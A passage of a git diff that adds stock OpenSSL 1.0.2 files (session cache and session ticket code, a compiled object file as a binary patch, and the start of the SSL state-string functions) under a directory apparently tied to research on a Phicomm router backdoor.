+    return (1);
+}
+
+int SSL_set_session_ticket_ext(SSL *s, void *ext_data, int ext_len)
+{
+    if (s->version >= TLS1_VERSION) {
+        if (s->tlsext_session_ticket) {
+            OPENSSL_free(s->tlsext_session_ticket);
+            s->tlsext_session_ticket = NULL;
+        }
+
+        s->tlsext_session_ticket =
+            OPENSSL_malloc(sizeof(TLS_SESSION_TICKET_EXT) + ext_len);
+        if (!s->tlsext_session_ticket) {
+            SSLerr(SSL_F_SSL_SET_SESSION_TICKET_EXT, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+
+        if (ext_data) {
+            s->tlsext_session_ticket->length = ext_len;
+            s->tlsext_session_ticket->data = s->tlsext_session_ticket + 1;
+            memcpy(s->tlsext_session_ticket->data, ext_data, ext_len);
+        } else {
+            s->tlsext_session_ticket->length = 0;
+            s->tlsext_session_ticket->data = NULL;
+        }
+
+        return 1;
+    }
+
+    return 0;
+}
+#endif                          /* OPENSSL_NO_TLSEXT */
+
+typedef struct timeout_param_st {
+    SSL_CTX *ctx;
+    long time;
+    LHASH_OF(SSL_SESSION) *cache;
+} TIMEOUT_PARAM;
+
+static void timeout_doall_arg(SSL_SESSION *s, TIMEOUT_PARAM *p)
+{
+    if ((p->time == 0) || (p->time > (s->time + s->timeout))) { /* timeout */
+        /*
+         * The reason we don't call SSL_CTX_remove_session() is to save on
+         * locking overhead
+         */
+        (void)lh_SSL_SESSION_delete(p->cache, s);
+        SSL_SESSION_list_remove(p->ctx, s);
+        s->not_resumable = 1;
+        if (p->ctx->remove_session_cb != NULL)
+            p->ctx->remove_session_cb(p->ctx, s);
+        SSL_SESSION_free(s);
+    }
+}
+
+static IMPLEMENT_LHASH_DOALL_ARG_FN(timeout, SSL_SESSION, TIMEOUT_PARAM)
+
+void SSL_CTX_flush_sessions(SSL_CTX *s, long t)
+{
+    unsigned long i;
+    TIMEOUT_PARAM tp;
+
+    tp.ctx = s;
+    tp.cache = s->sessions;
+    if (tp.cache == NULL)
+        return;
+    tp.time = t;
+    CRYPTO_w_lock(CRYPTO_LOCK_SSL_CTX);
+    i = CHECKED_LHASH_OF(SSL_SESSION, tp.cache)->down_load;
+    CHECKED_LHASH_OF(SSL_SESSION, tp.cache)->down_load = 0;
+    lh_SSL_SESSION_doall_arg(tp.cache, LHASH_DOALL_ARG_FN(timeout),
+                             TIMEOUT_PARAM, &tp);
+    CHECKED_LHASH_OF(SSL_SESSION, tp.cache)->down_load = i;
+    CRYPTO_w_unlock(CRYPTO_LOCK_SSL_CTX);
+}
+
+int ssl_clear_bad_session(SSL *s)
+{
+    if ((s->session != NULL) &&
+        !(s->shutdown & SSL_SENT_SHUTDOWN) &&
+        !(SSL_in_init(s) || SSL_in_before(s))) {
+        SSL_CTX_remove_session(s->ctx, s->session);
+        return (1);
+    } else
+        return (0);
+}
+
+/* locked by SSL_CTX in the calling function */
+static void SSL_SESSION_list_remove(SSL_CTX *ctx, SSL_SESSION *s)
+{
+    if ((s->next == NULL) || (s->prev == NULL))
+        return;
+
+    if (s->next == (SSL_SESSION *)&(ctx->session_cache_tail)) {
+        /* last element in list */
+        if (s->prev == (SSL_SESSION *)&(ctx->session_cache_head)) {
+            /* only one element in list */
+            ctx->session_cache_head = NULL;
+            ctx->session_cache_tail = NULL;
+        } else {
+            ctx->session_cache_tail = s->prev;
+            s->prev->next = (SSL_SESSION *)&(ctx->session_cache_tail);
+        }
+    } else {
+        if (s->prev == (SSL_SESSION *)&(ctx->session_cache_head)) {
+            /* first element in list */
+            ctx->session_cache_head = s->next;
+            s->next->prev = (SSL_SESSION *)&(ctx->session_cache_head);
+        } else {
+            /* middle of list */
+            s->next->prev = s->prev;
+            s->prev->next = s->next;
+        }
+    }
+    s->prev = s->next = NULL;
+}
+
+static void SSL_SESSION_list_add(SSL_CTX *ctx, SSL_SESSION *s)
+{
+    if ((s->next != NULL) && (s->prev != NULL))
+        SSL_SESSION_list_remove(ctx, s);
+
+    if (ctx->session_cache_head == NULL) {
+        ctx->session_cache_head = s;
+        ctx->session_cache_tail = s;
+        s->prev = (SSL_SESSION *)&(ctx->session_cache_head);
+        s->next = (SSL_SESSION *)&(ctx->session_cache_tail);
+    } else {
+        s->next = ctx->session_cache_head;
+        s->next->prev = s;
+        s->prev = (SSL_SESSION *)&(ctx->session_cache_head);
+        ctx->session_cache_head = s;
+    }
+}
+
+void SSL_CTX_sess_set_new_cb(SSL_CTX *ctx,
+                             int (*cb) (struct ssl_st *ssl,
+                                        SSL_SESSION *sess))
+{
+    ctx->new_session_cb = cb;
+}
+
+int (*SSL_CTX_sess_get_new_cb(SSL_CTX *ctx)) (SSL *ssl, SSL_SESSION *sess) {
+    return ctx->new_session_cb;
+}
+
+void SSL_CTX_sess_set_remove_cb(SSL_CTX *ctx,
+                                void (*cb) (SSL_CTX *ctx, SSL_SESSION *sess))
+{
+    ctx->remove_session_cb = cb;
+}
+
+void (*SSL_CTX_sess_get_remove_cb(SSL_CTX *ctx)) (SSL_CTX *ctx,
+                                                  SSL_SESSION *sess) {
+    return ctx->remove_session_cb;
+}
+
+void SSL_CTX_sess_set_get_cb(SSL_CTX *ctx,
+                             SSL_SESSION *(*cb) (struct ssl_st *ssl,
+                                                 unsigned char *data, int len,
+                                                 int *copy))
+{
+    ctx->get_session_cb = cb;
+}
+
+SSL_SESSION *(*SSL_CTX_sess_get_get_cb(SSL_CTX *ctx)) (SSL *ssl,
+                                                       unsigned char *data,
+                                                       int len, int *copy) {
+    return ctx->get_session_cb;
+}
+
+void SSL_CTX_set_info_callback(SSL_CTX *ctx,
+                               void (*cb) (const SSL *ssl, int type, int val))
+{
+    ctx->info_callback = cb;
+}
+
+void (*SSL_CTX_get_info_callback(SSL_CTX *ctx)) (const SSL *ssl, int type,
+                                                 int val) {
+    return ctx->info_callback;
+}
+
+void SSL_CTX_set_client_cert_cb(SSL_CTX *ctx,
+                                int (*cb) (SSL *ssl, X509 **x509,
+                                           EVP_PKEY **pkey))
+{
+    ctx->client_cert_cb = cb;
+}
+
+int (*SSL_CTX_get_client_cert_cb(SSL_CTX *ctx)) (SSL *ssl, X509 **x509,
+                                                 EVP_PKEY **pkey) {
+    return ctx->client_cert_cb;
+}
+
+#ifndef OPENSSL_NO_ENGINE
+int SSL_CTX_set_client_cert_engine(SSL_CTX *ctx, ENGINE *e)
+{
+    if (!ENGINE_init(e)) {
+        SSLerr(SSL_F_SSL_CTX_SET_CLIENT_CERT_ENGINE, ERR_R_ENGINE_LIB);
+        return 0;
+    }
+    if (!ENGINE_get_ssl_client_cert_function(e)) {
+        SSLerr(SSL_F_SSL_CTX_SET_CLIENT_CERT_ENGINE,
+               SSL_R_NO_CLIENT_CERT_METHOD);
+        ENGINE_finish(e);
+        return 0;
+    }
+    ctx->client_cert_engine = e;
+    return 1;
+}
+#endif
+
+void SSL_CTX_set_cookie_generate_cb(SSL_CTX *ctx,
+                                    int (*cb) (SSL *ssl,
+                                               unsigned char *cookie,
+                                               unsigned int *cookie_len))
+{
+    ctx->app_gen_cookie_cb = cb;
+}
+
+void SSL_CTX_set_cookie_verify_cb(SSL_CTX *ctx,
+                                  int (*cb) (SSL *ssl, unsigned char *cookie,
+                                             unsigned int cookie_len))
+{
+    ctx->app_verify_cookie_cb = cb;
+}
+
+IMPLEMENT_PEM_rw(SSL_SESSION, SSL_SESSION, PEM_STRING_SSL_SESSION,
+                 SSL_SESSION)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_sess.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_sess.o
new file mode 100644
index 0000000000000000000000000000000000000000..6922208fef8c29a49d7af057b5481862f3f23c0e
GIT binary patch
literal 14816
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
Hs>=TlCS?h^

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_stat.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_stat.c
new file mode 100644
index 0000000..d725d78
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_stat.c
@@ -0,0 +1,1072 @@
+/* ssl/ssl_stat.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+#include <stdio.h>
+#include "ssl_locl.h"
+
+const char *SSL_state_string_long(const SSL *s)
+{
+    const char *str;
+
+    switch (s->state) {
+    case SSL_ST_BEFORE:
+        str = "before SSL initialization";
+        break;
+    case SSL_ST_ACCEPT:
+        str = "before accept initialization";
+        break;
+    case SSL_ST_CONNECT:
+        str = "before connect initialization";
+        break;
+    case SSL_ST_OK:
+        str = "SSL negotiation finished successfully";
+        break;
+    case SSL_ST_RENEGOTIATE:
+        str = "SSL renegotiate ciphers";
+        break;
+    case SSL_ST_BEFORE | SSL_ST_CONNECT:
+        str = "before/connect initialization";
+        break;
+    case SSL_ST_OK | SSL_ST_CONNECT:
+        str = "ok/connect SSL initialization";
+        break;
+    case SSL_ST_BEFORE | SSL_ST_ACCEPT:
+        str = "before/accept initialization";
+        break;
+    case SSL_ST_OK | SSL_ST_ACCEPT:
+        str = "ok/accept SSL initialization";
+        break;
+#ifndef OPENSSL_NO_SSL2
+    case SSL2_ST_CLIENT_START_ENCRYPTION:
+        str = "SSLv2 client start encryption";
+        break;
+    case SSL2_ST_SERVER_START_ENCRYPTION:
+        str = "SSLv2 server start encryption";
+        break;
+    case SSL2_ST_SEND_CLIENT_HELLO_A:
+        str = "SSLv2 write client hello A";
+        break;
+    case SSL2_ST_SEND_CLIENT_HELLO_B:
+        str = "SSLv2 write client hello B";
+        break;
+    case SSL2_ST_GET_SERVER_HELLO_A:
+        str = "SSLv2 read server hello A";
+        break;
+    case SSL2_ST_GET_SERVER_HELLO_B:
+        str = "SSLv2 read server hello B";
+        break;
+    case SSL2_ST_SEND_CLIENT_MASTER_KEY_A:
+        str = "SSLv2 write client master key A";
+        break;
+    case SSL2_ST_SEND_CLIENT_MASTER_KEY_B:
+        str = "SSLv2 write client master key B";
+        break;
+    case SSL2_ST_SEND_CLIENT_FINISHED_A:
+        str = "SSLv2 write client finished A";
+        break;
+    case SSL2_ST_SEND_CLIENT_FINISHED_B:
+        str = "SSLv2 write client finished B";
+        break;
+    case SSL2_ST_SEND_CLIENT_CERTIFICATE_A:
+        str = "SSLv2 write client certificate A";
+        break;
+    case SSL2_ST_SEND_CLIENT_CERTIFICATE_B:
+        str = "SSLv2 write client certificate B";
+        break;
+    case SSL2_ST_SEND_CLIENT_CERTIFICATE_C:
+        str = "SSLv2 write client certificate C";
+        break;
+    case SSL2_ST_SEND_CLIENT_CERTIFICATE_D:
+        str = "SSLv2 write client certificate D";
+        break;
+    case SSL2_ST_GET_SERVER_VERIFY_A:
+        str = "SSLv2 read server verify A";
+        break;
+    case SSL2_ST_GET_SERVER_VERIFY_B:
+        str = "SSLv2 read server verify B";
+        break;
+    case SSL2_ST_GET_SERVER_FINISHED_A:
+        str = "SSLv2 read server finished A";
+        break;
+    case SSL2_ST_GET_SERVER_FINISHED_B:
+        str = "SSLv2 read server finished B";
+        break;
+    case SSL2_ST_GET_CLIENT_HELLO_A:
+        str = "SSLv2 read client hello A";
+        break;
+    case SSL2_ST_GET_CLIENT_HELLO_B:
+        str = "SSLv2 read client hello B";
+        break;
+    case SSL2_ST_GET_CLIENT_HELLO_C:
+        str = "SSLv2 read client hello C";
+        break;
